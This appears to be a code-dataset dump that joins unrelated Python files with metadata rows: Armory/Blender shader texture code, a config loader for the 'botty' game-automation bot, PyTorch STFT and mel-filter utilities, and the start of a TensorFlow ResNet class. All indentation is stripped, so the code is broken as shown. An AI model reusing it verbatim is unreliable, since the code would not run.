return tex_store
parsed[tex_store] = True
mat_bind_texture(tex)
con.add_elem('tex', 'short2norm')
curshader.add_uniform('sampler2D {0}'.format(tex_name), link=tex_link)
if node.inputs[0].is_linked:
uv_name = parse_vector_input(node.inputs[0])
uv_name = 'vec2({0}.x, 1.0 - {0}.y)'.format(uv_name)
else:
uv_name = 'texCoord'
triplanar = node.projection == 'BOX'
if triplanar:
curshader.write(f'vec3 texCoordBlend = vec3(0.0); vec2 {uv_name}1 = vec2(0.0); vec2 {uv_name}2 = vec2(0.0);') # Temp
curshader.write(f'vec4 {tex_store} = vec4(0.0, 0.0, 0.0, 0.0);')
curshader.write(f'if (texCoordBlend.x > 0) {tex_store} += texture({tex_name}, {uv_name}.xy) * texCoordBlend.x;')
curshader.write(f'if (texCoordBlend.y > 0) {tex_store} += texture({tex_name}, {uv_name}1.xy) * texCoordBlend.y;')
curshader.write(f'if (texCoordBlend.z > 0) {tex_store} += texture({tex_name}, {uv_name}2.xy) * texCoordBlend.z;')
else:
if mat_texture_grad():
curshader.write('vec4 {0} = textureGrad({1}, {2}.xy, g2.xy, g2.zw);'.format(tex_store, tex_name, uv_name))
else:
curshader.write('vec4 {0} = texture({1}, {2}.xy);'.format(tex_store, tex_name, uv_name))
if sample_bump:
sample_bump_res = tex_store
curshader.write('float {0}_1 = textureOffset({1}, {2}.xy, ivec2(-2, 0)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_2 = textureOffset({1}, {2}.xy, ivec2(2, 0)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_3 = textureOffset({1}, {2}.xy, ivec2(0, -2)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_4 = textureOffset({1}, {2}.xy, ivec2(0, 2)).r;'.format(tex_store, tex_name, uv_name))
sample_bump = False
if to_linear:
curshader.write('{0}.rgb = pow({0}.rgb, vec3(2.2));'.format(tex_store))
return tex_store
def write_bump(node, res, scl=0.001):
global sample_bump
global sample_bump_res
sample_bump_res = store_var_name(node) + '_bump'
# Testing.. get function parts..
ar = res.split('(', 1)
pre = ar[0] + '('
if ',' in ar[1]:
ar2 = ar[1].split(',', 1)
co = ar2[0]
post = ',' + ar2[1]
else:
co = ar[1][:-1]
post = ')'
curshader.write('float {0}_1 = {1}{2} + vec3(-{4}, 0.0, 0.0){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_2 = {1}{2} + vec3({4}, 0.0, {4}){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_3 = {1}{2} + vec3(0.0, -{4}, 0.0){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_4 = {1}{2} + vec3(0.0, {4}, -{4}){3};'.format(sample_bump_res, pre, co, post, scl))
sample_bump = False
def to_vec1(v):
return str(v)
def to_vec3(v):
return 'vec3({0}, {1}, {2})'.format(v[0], v[1], v[2])
def node_by_type(nodes, ntype):
for n in nodes:
if n.type == ntype:
return n
def socket_index(node, socket):
for i in range(0, len(node.outputs)):
if node.outputs[i] == socket:
return i
def node_name(s):
for p in parents:
s = p.name + '_' + s
if curshader.write_textures > 0:
s += '_texread'
s = safesrc(s)
if '__' in s: # Consecutive _ are reserved
s = s.replace('_', '_x')
return s
##
def make_texture(image_node, tex_name, matname=None):
tex = {}
tex['name'] = tex_name
image = image_node.image
if matname is None:
matname = mat_state.material.name
if image is None:
return None
# Get filepath
filepath = image.filepath
if filepath == '':
if image.packed_file is not None:
filepath = './' + image.name
has_ext = filepath.endswith(('.jpg', '.png', '.hdr'))
if not has_ext:
# Raw bytes, write converted .jpg to /unpacked
filepath += '.raw'
elif image.source == "GENERATED":
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
filepath = os.path.join(unpack_path, image.name + ".jpg")
arm.utils.convert_image(image, filepath, "JPEG")
else:
arm.log.warn(matname + '/' + image.name + ' - invalid file path')
return None
# Reference image name
texpath = arm.utils.asset_path(filepath)
texfile = arm.utils.extract_filename(filepath)
tex['file'] = arm.utils.safestr(texfile)
s = tex['file'].rsplit('.', 1)
if len(s) == 1:
arm.log.warn(matname + '/' + image.name + ' - file extension required for image name')
return None
ext = s[1].lower()
do_convert = ext not in ('jpg', 'png', 'hdr', 'mp4') # Convert image
if do_convert:
new_ext = 'png' if (ext in ('tga', 'dds')) else 'jpg'
tex['file'] = tex['file'].rsplit('.', 1)[0] + '.' + new_ext
if image.packed_file is not None or not is_ascii(texfile):
# Extract packed data / copy non-ascii texture
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
unpack_filepath = os.path.join(unpack_path, tex['file'])
if do_convert:
if not os.path.isfile(unpack_filepath):
fmt = 'PNG' if new_ext == 'png' else 'JPEG'
arm.utils.convert_image(image, unpack_filepath, file_format=fmt)
else:
# Write bytes if size is different or file does not exist yet
if image.packed_file is not None:
if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != image.packed_file.size:
with open(unpack_filepath, 'wb') as f:
f.write(image.packed_file.data)
# Copy non-ascii texture
else:
if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != os.path.getsize(texpath):
shutil.copy(texpath, unpack_filepath)
arm.assets.add(unpack_filepath)
else:
if not os.path.isfile(arm.utils.asset_path(filepath)):
arm.log.warn('Material ' + matname + '/' + image.name + ' - file not found(' + filepath + ')')
return None
if do_convert:
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
converted_path = os.path.join(unpack_path, tex['file'])
# TODO: delete cache when file changes
if not os.path.isfile(converted_path):
fmt = 'PNG' if new_ext == 'png' else 'JPEG'
arm.utils.convert_image(image, converted_path, file_format=fmt)
arm.assets.add(converted_path)
else:
# Link image path to assets
# TODO: Khamake converts .PNG to .jpg? Convert ext to lowercase on windows
if arm.utils.get_os() == 'win':
s = filepath.rsplit('.', 1)
arm.assets.add(arm.utils.asset_path(s[0] + '.' + s[1].lower()))
else:
arm.assets.add(arm.utils.asset_path(filepath))
# if image_format != 'RGBA32':
# tex['format'] = image_format
interpolation = image_node.interpolation
rpdat = arm.utils.get_rp()
texfilter = rpdat.arm_texture_filter
if texfilter == 'Anisotropic':
interpolation = 'Smart'
elif texfilter == 'Linear':
interpolation = 'Linear'
elif texfilter == 'Point':
interpolation = 'Closest'
# TODO: Blender seems to load full images on size request, cache size instead
powimage = is_pow(image.size[0]) and is_pow(image.size[1])
if interpolation == 'Cubic': # Mipmap linear
tex['mipmap_filter'] = 'linear'
tex['generate_mipmaps'] = True
elif interpolation == 'Smart': # Mipmap anisotropic
tex['min_filter'] = 'anisotropic'
tex['mipmap_filter'] = 'linear'
tex['generate_mipmaps'] = True
elif interpolation == 'Closest':
tex['min_filter'] = 'point'
tex['mag_filter'] = 'point'
# else defaults to linear
if image_node.extension != 'REPEAT': # Extend or clip
tex['u_addressing'] = 'clamp'
tex['v_addressing'] = 'clamp'
if image.source == 'MOVIE':
tex['source'] = 'movie'
tex['min_filter'] = 'linear'
tex['mag_filter'] = 'linear'
tex['mipmap_filter'] = 'no'
tex['generate_mipmaps'] = False
return tex
def is_pow(num):
return ((num & (num - 1)) == 0) and num != 0
def is_ascii(s):
return len(s) == len(s.encode())
##
def get_rp_renderer():
return arm.utils.get_rp().rp_renderer
def get_arm_export_tangents():
return bpy.data.worlds['Arm'].arm_export_tangents
def safesrc(name):
return arm.utils.safesrc(name)
def get_sdk_path():
return arm.utils.get_sdk_path()
def disp_enabled():
return arm.utils.disp_enabled(arm.make_state.target)
def warn(text):
arm.log.warn(text)
def assets_add(path):
arm.assets.add(path)
def assets_add_embedded_data(path):
arm.assets.add_embedded_data(path)
def mat_name():
return mat_state.material.name
def mat_batch():
return mat_state.batch
def mat_bind_texture(tex):
mat_state.bind_textures.append(tex)
def mat_texture_grad():
return mat_state.texture_grad
def mat_get_material():
return mat_state.material
def mat_get_material_users():
return mat_state.mat_users
| 1.671875 | 2 |
src/config.py | Jizanator/botty | 0 | 4994 | import configparser
import numpy as np
import os
class Config:
def _select_val(self, section: str, key: str = None):
if section in self._custom and key in self._custom[section]:
return self._custom[section][key]
elif section in self._config:
return self._config[section][key]
elif section in self._pickit_config:
return self._pickit_config[section][key]
elif section in self._shop_config:
return self._shop_config[section][key]
else:
return self._game_config[section][key]
def __init__(self, print_warnings: bool = False):
# print_warnings, what a hack... here it is, not making the effort
# passing a single config instance through bites me in the ass
self._print_warnings = print_warnings
self._config = configparser.ConfigParser()
self._config.read('config/params.ini')
self._game_config = configparser.ConfigParser()
self._game_config.read('config/game.ini')
self._pickit_config = configparser.ConfigParser()
self._pickit_config.read('config/pickit.ini')
self._shop_config = configparser.ConfigParser()
self._shop_config.read('config/shop.ini')
self._custom = configparser.ConfigParser()
if os.environ.get('RUN_ENV') != "test" and os.path.exists('config/custom.ini'):
self._custom.read('config/custom.ini')
self.general = {
"saved_games_folder": self._select_val("general", "saved_games_folder"),
"name": self._select_val("general", "name"),
"monitor": int(self._select_val("general", "monitor")),
"max_game_length_s": float(self._select_val("general", "max_game_length_s")),
"exit_key": self._select_val("general", "exit_key"),
"resume_key": self._select_val("general", "resume_key"),
"auto_settings_key": self._select_val("general", "auto_settings_key"),
"graphic_debugger_key": self._select_val("general", "graphic_debugger_key"),
"logg_lvl": self._select_val("general", "logg_lvl"),
"randomize_runs": bool(int(self._select_val("general", "randomize_runs"))),
"difficulty": self._select_val("general", "difficulty"),
"custom_message_hook": self._select_val("general", "custom_message_hook"),
"discord_status_count": False if not self._select_val("general", "discord_status_count") else int(self._select_val("general", "discord_status_count")),
"info_screenshots": bool(int(self._select_val("general", "info_screenshots"))),
"loot_screenshots": bool(int(self._select_val("general", "loot_screenshots"))),
}
# Added for dclone ip hunting
self.dclone = {
"region_ips": self._select_val("dclone", "region_ips"),
"dclone_hotip": self._select_val("dclone", "dclone_hotip"),
}
self.routes = {}
for key in self._config["routes"]:
self.routes[key] = bool(int(self._select_val("routes", key)))
self.char = {
"type": self._select_val("char", "type"),
"show_items": self._select_val("char", "show_items"),
"inventory_screen": self._select_val("char", "inventory_screen"),
"stand_still": self._select_val("char", "stand_still"),
"force_move": self._select_val("char", "force_move"),
"num_loot_columns": int(self._select_val("char", "num_loot_columns")),
"take_health_potion": float(self._select_val("char", "take_health_potion")),
"take_mana_potion": float(self._select_val("char", "take_mana_potion")),
"take_rejuv_potion_health": float(self._select_val("char", "take_rejuv_potion_health")),
"take_rejuv_potion_mana": float(self._select_val("char", "take_rejuv_potion_mana")),
"heal_merc": float(self._select_val("char", "heal_merc")),
"heal_rejuv_merc": float(self._select_val("char", "heal_rejuv_merc")),
"chicken": float(self._select_val("char", "chicken")),
"merc_chicken": float(self._select_val("char", "merc_chicken")),
"tp": self._select_val("char", "tp"),
"belt_rows": int(self._select_val("char", "belt_rows")),
"show_belt": self._select_val("char", "show_belt"),
"potion1": self._select_val("char", "potion1"),
"potion2": self._select_val("char", "potion2"),
"potion3": self._select_val("char", "potion3"),
"potion4": self._select_val("char", "potion4"),
"belt_rejuv_columns": int(self._select_val("char", "belt_rejuv_columns")),
"belt_hp_columns": int(self._select_val("char", "belt_hp_columns")),
"belt_mp_columns": int(self._select_val("char", "belt_mp_columns")),
"stash_gold": bool(int(self._select_val("char", "stash_gold"))),
"gold_trav_only": bool(int(self._select_val("char", "gold_trav_only"))),
"use_merc": bool(int(self._select_val("char", "use_merc"))),
"pre_buff_every_run": bool(int(self._select_val("char", "pre_buff_every_run"))),
"cta_available": bool(int(self._select_val("char", "cta_available"))),
"weapon_switch": self._select_val("char", "weapon_switch"),
"battle_orders": self._select_val("char", "battle_orders"),
"battle_command": self._select_val("char", "battle_command"),
"casting_frames": int(self._select_val("char", "casting_frames")),
"atk_len_trav": float(self._select_val("char", "atk_len_trav")),
"atk_len_pindle": float(self._select_val("char", "atk_len_pindle")),
"atk_len_eldritch": float(self._select_val("char", "atk_len_eldritch")),
"atk_len_shenk": float(self._select_val("char", "atk_len_shenk")),
"atk_len_nihlatak": float(self._select_val("char", "atk_len_nihlatak")),
"hork_time_pindle": float(self._select_val("char", "hork_time_pindle")),
"hork_time_eldritch": float(self._select_val("char", "hork_time_eldritch")),
"hork_time_shenk": float(self._select_val("char", "hork_time_shenk")),
"hork_time_council": float(self._select_val("char", "hork_time_council")),
"hork_time_nihlatak": float(self._select_val("char", "hork_time_nihlatak")),
}
self.sorceress = dict(self._config["sorceress"])
if "sorceress" in self._custom:
self.sorceress.update(dict(self._custom["sorceress"]))
self.hammerdin = self._config["hammerdin"]
if "hammerdin" in self._custom:
self.hammerdin.update(self._custom["hammerdin"])
self.trapsin = self._config["trapsin"]
if "trapsin" in self._custom:
self.trapsin.update(self._custom["trapsin"])
self.barbarian = self._config["barbarian"]
if "barbarian" in self._custom:
self.barbarian.update(self._custom["barbarian"])
self.advanced_options = {
"pathing_delay_factor": min(max(int(self._select_val("advanced_options", "pathing_delay_factor")), 1), 10),
"message_headers": self._select_val("advanced_options", "message_headers"),
"message_body_template": self._select_val("advanced_options", "message_body_template"),
"message_highlight": bool(int(self._select_val("advanced_options", "message_highlight"))),
}
self.items = {}
for key in self._pickit_config["items"]:
self.items[key] = int(self._select_val("items", key))
if self.items[key] and not os.path.exists(f"./assets/items/{key}.png") and self._print_warnings:
print(f"Warning: You activated {key} in pickit, but there is no img available in assets/items")
self.colors = {}
for key in self._game_config["colors"]:
self.colors[key] = np.split(np.array([int(x) for x in self._select_val("colors", key).split(",")]), 2)
self.ui_pos = {}
for key in self._game_config["ui_pos"]:
self.ui_pos[key] = int(self._select_val("ui_pos", key))
self.ui_roi = {}
for key in self._game_config["ui_roi"]:
self.ui_roi[key] = np.array([int(x) for x in self._select_val("ui_roi", key).split(",")])
self.path = {}
for key in self._game_config["path"]:
self.path[key] = np.reshape(np.array([int(x) for x in self._select_val("path", key).split(",")]), (-1, 2))
self.shop = {
"shop_trap_claws": bool(int(self._select_val("claws", "shop_trap_claws"))),
"shop_melee_claws": bool(int(self._select_val("claws", "shop_melee_claws"))),
"shop_3_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_3_skills_ias_gloves"))),
"shop_2_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_2_skills_ias_gloves"))),
"trap_min_score": int(self._select_val("claws", "trap_min_score")),
"melee_min_score": int(self._select_val("claws", "melee_min_score")),
}
if __name__ == "__main__":
config = Config(print_warnings=True)
# Check if any added items miss templates
for k in config.items:
if not os.path.exists(f"./assets/items/{k}.png"):
print(f"Template not found: {k}")
# Check if any item templates miss a config
for filename in os.listdir(f'assets/items'):
filename = filename.lower()
if filename.endswith('.png'):
item_name = filename[:-4]
blacklist_item = item_name.startswith("bl__")
if item_name not in config.items and not blacklist_item:
print(f"Config not found for: " + filename)
| 2.65625 | 3 |
aps/transform/utils.py | haoxiangsnr/aps | 2 | 4995 | # Copyright 2019 <NAME>
# License: Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import math
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as tf
import librosa.filters as filters
from aps.const import EPSILON
from typing import Optional, Union, Tuple
def init_window(wnd: str, frame_len: int) -> th.Tensor:
"""
Return window coefficient
Args:
wnd: window name
frame_len: length of the frame
"""
def sqrthann(frame_len, periodic=True):
return th.hann_window(frame_len, periodic=periodic)**0.5
if wnd not in ["bartlett", "hann", "hamm", "blackman", "rect", "sqrthann"]:
raise RuntimeError(f"Unknown window type: {wnd}")
wnd_tpl = {
"sqrthann": sqrthann,
"hann": th.hann_window,
"hamm": th.hamming_window,
"blackman": th.blackman_window,
"bartlett": th.bartlett_window,
"rect": th.ones
}
if wnd != "rect":
# match with librosa
c = wnd_tpl[wnd](frame_len, periodic=True)
else:
c = wnd_tpl[wnd](frame_len)
return c
def init_kernel(frame_len: int,
frame_hop: int,
window: str,
round_pow_of_two: bool = True,
normalized: bool = False,
inverse: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
Return STFT kernels
Args:
frame_len: length of the frame
frame_hop: hop size between frames
window: window name
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: return normalized DFT matrix
inverse: return iDFT matrix
mode: framing mode (librosa or kaldi)
"""
if mode not in ["librosa", "kaldi"]:
raise ValueError(f"Unsupported mode: {mode}")
# FFT points
B = 2**math.ceil(math.log2(frame_len)) if round_pow_of_two else frame_len
# center padding window if needed
if mode == "librosa" and B != frame_len:
lpad = (B - frame_len) // 2
window = tf.pad(window, (lpad, B - frame_len - lpad))
if normalized:
# make K^H * K = I
S = B**0.5
else:
S = 1
I = th.stack([th.eye(B), th.zeros(B, B)], dim=-1)
# W x B x 2
K = th.fft(I / S, 1)
if mode == "kaldi":
K = K[:frame_len]
if inverse and not normalized:
# to make K^H * K = I
K = K / B
# 2 x B x W
K = th.transpose(K, 0, 2) * window
# 2B x 1 x W
K = th.reshape(K, (B * 2, 1, K.shape[-1]))
return K, window
def mel_filter(frame_len: int,
round_pow_of_two: bool = True,
num_bins: Optional[int] = None,
sr: int = 16000,
num_mels: int = 80,
fmin: float = 0.0,
fmax: Optional[float] = None,
norm: bool = False) -> th.Tensor:
"""
Return mel filter coefficients
Args:
frame_len: length of the frame
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
num_bins: number of the frequency bins produced by STFT
num_mels: number of the mel bands
fmin: lowest frequency (in Hz)
fmax: highest frequency (in Hz)
norm: normalize the mel filter coefficients
"""
# FFT points
if num_bins is None:
N = 2**math.ceil(
math.log2(frame_len)) if round_pow_of_two else frame_len
else:
N = (num_bins - 1) * 2
# fmin & fmax
freq_upper = sr // 2
if fmax is None:
fmax = freq_upper
else:
fmax = min(fmax + freq_upper if fmax < 0 else fmax, freq_upper)
fmin = max(0, fmin)
# mel filter coefficients
mel = filters.mel(sr,
N,
n_mels=num_mels,
fmax=fmax,
fmin=fmin,
htk=True,
norm="slaney" if norm else None)
# num_mels x (N // 2 + 1)
return th.tensor(mel, dtype=th.float32)
def speed_perturb_filter(src_sr: int,
dst_sr: int,
cutoff_ratio: float = 0.95,
num_zeros: int = 64) -> th.Tensor:
"""
Return speed perturb filters, reference:
https://github.com/danpovey/filtering/blob/master/lilfilter/resampler.py
Args:
src_sr: sample rate of the source signal
dst_sr: sample rate of the target signal
Return:
weight (Tensor): coefficients of the filter
"""
if src_sr == dst_sr:
raise ValueError(
f"src_sr should not be equal to dst_sr: {src_sr}/{dst_sr}")
gcd = math.gcd(src_sr, dst_sr)
src_sr = src_sr // gcd
dst_sr = dst_sr // gcd
if src_sr == 1 or dst_sr == 1:
raise ValueError("do not support integer downsample/upsample")
zeros_per_block = min(src_sr, dst_sr) * cutoff_ratio
padding = 1 + int(num_zeros / zeros_per_block)
# dst_sr x src_sr x K
times = (np.arange(dst_sr)[:, None, None] / float(dst_sr) -
np.arange(src_sr)[None, :, None] / float(src_sr) -
np.arange(2 * padding + 1)[None, None, :] + padding)
window = np.heaviside(1 - np.abs(times / padding),
0.0) * (0.5 + 0.5 * np.cos(times / padding * math.pi))
weight = np.sinc(
times * zeros_per_block) * window * zeros_per_block / float(src_sr)
return th.tensor(weight, dtype=th.float32)
def splice_feature(feats: th.Tensor,
lctx: int = 1,
rctx: int = 1,
subsampling_factor: int = 1,
op: str = "cat") -> th.Tensor:
"""
Splice feature
Args:
feats (Tensor): N x ... x T x F, original feature
lctx: left context
rctx: right context
subsampling_factor: subsampling factor
op: operator on feature context
Return:
splice (Tensor): feature with context padded
"""
if lctx + rctx == 0:
return feats
if op not in ["cat", "stack"]:
raise ValueError(f"Unknown op for feature splicing: {op}")
# [N x ... x T x F, ...]
ctx = []
T = feats.shape[-2]
T = T - T % subsampling_factor
for c in range(-lctx, rctx + 1):
idx = th.arange(c, c + T, device=feats.device, dtype=th.int64)
idx = th.clamp(idx, min=0, max=T - 1)
ctx.append(th.index_select(feats, -2, idx))
if op == "cat":
# N x ... x T x FD
splice = th.cat(ctx, -1)
else:
# N x ... x T x F x D
splice = th.stack(ctx, -1)
return splice
def _forward_stft(
wav: th.Tensor,
kernel: th.Tensor,
output: str = "polar",
pre_emphasis: float = 0,
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT inner function
Args:
wav (Tensor), N x (C) x S
kernel (Tensor), STFT transform kernels, from init_kernel(...)
output (str), output format:
polar: return (magnitude, phase) pair
complex: return (real, imag) pair
real: return [real; imag] Tensor
frame_hop: frame hop size in number samples
pre_emphasis: factor of preemphasis
onesided: return half FFT bins
center: if true, we assumed to have centered frames
Return:
transform (Tensor or [Tensor, Tensor]), STFT transform results
"""
wav_dim = wav.dim()
if output not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {output}")
if wav_dim not in [2, 3]:
raise RuntimeError(f"STFT expect 2D/3D tensor, but got {wav_dim:d}D")
# if N x S, reshape N x 1 x S
# else: reshape NC x 1 x S
N, S = wav.shape[0], wav.shape[-1]
wav = wav.view(-1, 1, S)
# NC x 1 x S+2P
if center:
pad = kernel.shape[-1] // 2
# NOTE: match with librosa
wav = tf.pad(wav, (pad, pad), mode="reflect")
# STFT
if pre_emphasis > 0:
# NC x W x T
frames = tf.unfold(wav[:, None], (1, kernel.shape[-1]),
stride=frame_hop,
padding=0)
frames[:, 1:] = frames[:, 1:] - pre_emphasis * frames[:, :-1]
# 1 x 2B x W, NC x W x T, NC x 2B x T
packed = th.matmul(kernel[:, 0][None, ...], frames)
else:
packed = tf.conv1d(wav, kernel, stride=frame_hop, padding=0)
# NC x 2B x T => N x C x 2B x T
if wav_dim == 3:
packed = packed.view(N, -1, packed.shape[-2], packed.shape[-1])
# N x (C) x B x T
real, imag = th.chunk(packed, 2, dim=-2)
# N x (C) x B/2+1 x T
if onesided:
num_bins = kernel.shape[0] // 4 + 1
real = real[..., :num_bins, :]
imag = imag[..., :num_bins, :]
if output == "complex":
return (real, imag)
elif output == "real":
return th.stack([real, imag], dim=-1)
else:
mag = (real**2 + imag**2 + EPSILON)**0.5
pha = th.atan2(imag, real)
return (mag, pha)
def _inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
kernel: th.Tensor,
window: th.Tensor,
input: str = "polar",
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> th.Tensor:
"""
iSTFT inner function
Args:
transform (Tensor or [Tensor, Tensor]), STFT transform results
kernel (Tensor), STFT transform kernels, from init_kernel(...)
input (str), input format:
polar: return (magnitude, phase) pair
complex: return (real, imag) pair
real: return [real; imag] Tensor
frame_hop: frame hop size in number samples
onesided: return half FFT bins
center: used in _forward_stft
Return:
wav (Tensor), N x S
"""
if input not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {input}")
if input == "real":
real, imag = transform[..., 0], transform[..., 1]
elif input == "polar":
real = transform[0] * th.cos(transform[1])
imag = transform[0] * th.sin(transform[1])
else:
real, imag = transform
# (N) x F x T
imag_dim = imag.dim()
if imag_dim not in [2, 3]:
raise RuntimeError(f"Expect 2D/3D tensor, but got {imag_dim}D")
# if F x T, reshape 1 x F x T
if imag_dim == 2:
real = th.unsqueeze(real, 0)
imag = th.unsqueeze(imag, 0)
if onesided:
# [self.num_bins - 2, ..., 1]
reverse = range(kernel.shape[0] // 4 - 1, 0, -1)
# extend matrix: N x B x T
real = th.cat([real, real[:, reverse]], 1)
imag = th.cat([imag, -imag[:, reverse]], 1)
# pack: N x 2B x T
packed = th.cat([real, imag], dim=1)
# N x 1 x T
s = tf.conv_transpose1d(packed, kernel, stride=frame_hop, padding=0)
# normalized audio samples
# refer: https://github.com/pytorch/audio/blob/2ebbbf511fb1e6c47b59fd32ad7e66023fa0dff1/torchaudio/functional.py#L171
# 1 x W x T
win = th.repeat_interleave(window[None, ..., None],
packed.shape[-1],
dim=-1)
# W x 1 x W
I = th.eye(window.shape[0], device=win.device)[:, None]
# 1 x 1 x T
norm = tf.conv_transpose1d(win**2, I, stride=frame_hop, padding=0)
if center:
pad = kernel.shape[-1] // 2
s = s[..., pad:-pad]
norm = norm[..., pad:-pad]
s = s / (norm + EPSILON)
# N x S
s = s.squeeze(1)
return s
def forward_stft(
wav: th.Tensor,
frame_len: int,
frame_hop: int,
output: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
pre_emphasis: float = 0,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT function implementation, equals to STFT layer
Args:
wav: source audio signal
frame_len: length of the frame
frame_hop: hop size between frames
output: output type (complex, real, polar)
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
pre_emphasis: factor of preemphasis
normalized: use normalized DFT kernel
onesided: output onesided STFT
inverse: using iDFT kernel (for iSTFT)
mode: "kaldi"|"librosa", slight difference on applying window function
"""
K, _ = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=False,
mode=mode)
return _forward_stft(wav,
K.to(wav.device),
output=output,
frame_hop=frame_hop,
pre_emphasis=pre_emphasis,
onesided=onesided,
center=center)
def inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
frame_len: int,
frame_hop: int,
input: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
iSTFT function implementation, equals to iSTFT layer
Args:
transform: results of STFT
frame_len: length of the frame
frame_hop: hop size between frames
input: input format (complex, real, polar)
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: use normalized DFT kernel
onesided: output onesided STFT
mode: "kaldi"|"librosa", slight difference on applying window function
"""
if isinstance(transform, th.Tensor):
device = transform.device
else:
device = transform[0].device
K, w = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=True,
mode=mode)
return _inverse_stft(transform,
K.to(device),
w.to(device),
input=input,
frame_hop=frame_hop,
onesided=onesided,
center=center)
class STFTBase(nn.Module):
"""
Base layer for (i)STFT
Args:
frame_len: length of the frame
frame_hop: hop size between frames
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: use normalized DFT kernel
pre_emphasis: factor of preemphasis
mode: "kaldi"|"librosa", slight difference on applying window function
onesided: output onesided STFT
inverse: using iDFT kernel (for iSTFT)
"""
def __init__(self,
frame_len: int,
frame_hop: int,
window: str = "sqrthann",
round_pow_of_two: bool = True,
normalized: bool = False,
pre_emphasis: float = 0,
onesided: bool = True,
inverse: bool = False,
center: bool = False,
mode="librosa") -> None:
super(STFTBase, self).__init__()
K, w = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=inverse,
mode=mode)
self.K = nn.Parameter(K, requires_grad=False)
self.w = nn.Parameter(w, requires_grad=False)
self.frame_len = frame_len
self.frame_hop = frame_hop
self.onesided = onesided
self.pre_emphasis = pre_emphasis
self.center = center
self.mode = mode
self.num_bins = self.K.shape[0] // 4 + 1
self.expr = (
f"window={window}, stride={frame_hop}, onesided={onesided}, " +
f"pre_emphasis={self.pre_emphasis}, normalized={normalized}, " +
f"center={self.center}, mode={self.mode}, " +
f"kernel_size={self.num_bins}x{self.K.shape[2]}")
def num_frames(self, wav_len: th.Tensor) -> th.Tensor:
"""
Compute number of the frames
"""
if th.sum(wav_len <= self.frame_len):
raise RuntimeError(
f"Audio samples less than frame_len ({self.frame_len})")
kernel_size = self.K.shape[-1]
if self.center:
wav_len += kernel_size
return (wav_len - kernel_size) // self.frame_hop + 1
def extra_repr(self) -> str:
return self.expr
class STFT(STFTBase):
"""
Short-time Fourier Transform as a Layer
"""
def __init__(self, *args, **kwargs):
super(STFT, self).__init__(*args, inverse=False, **kwargs)
def forward(
self,
wav: th.Tensor,
output: str = "polar"
) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
Accept (single or multiple channel) raw waveform and output magnitude and phase
Args
wav (Tensor) input signal, N x (C) x S
Return
transform (Tensor or [Tensor, Tensor]), N x (C) x F x T
"""
return _forward_stft(wav,
self.K,
output=output,
frame_hop=self.frame_hop,
pre_emphasis=self.pre_emphasis,
onesided=self.onesided,
center=self.center)
class iSTFT(STFTBase):
"""
Inverse Short-time Fourier Transform as a Layer
"""
def __init__(self, *args, **kwargs):
super(iSTFT, self).__init__(*args, inverse=True, **kwargs)
def forward(self,
transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
input: str = "polar") -> th.Tensor:
"""
Accept phase & magnitude and output raw waveform
Args
transform (Tensor or [Tensor, Tensor]), STFT output
Return
s (Tensor), N x S
"""
return _inverse_stft(transform,
self.K,
self.w,
input=input,
frame_hop=self.frame_hop,
onesided=self.onesided,
center=self.center)
| 2.046875 | 2 |
applications/tensorflow/cnns/models/resnet.py | xihuaiwen/chinese_bert | 0 | 4996 | <reponame>xihuaiwen/chinese_bert
# Copyright 2019 Graphcore Ltd.
from models.resnet_base import ResNet
import tensorflow.compat.v1 as tf
import tensorflow.contrib as contrib
from tensorflow.python.ipu import normalization_ops
# This is all written for: NHWC
class TensorflowResNet(ResNet):
def __init__(self, *args, **kwargs):
self.dtype = tf.float16
super(TensorflowResNet, self).__init__(*args, **kwargs)
def _get_variable(self, name, shape, init):
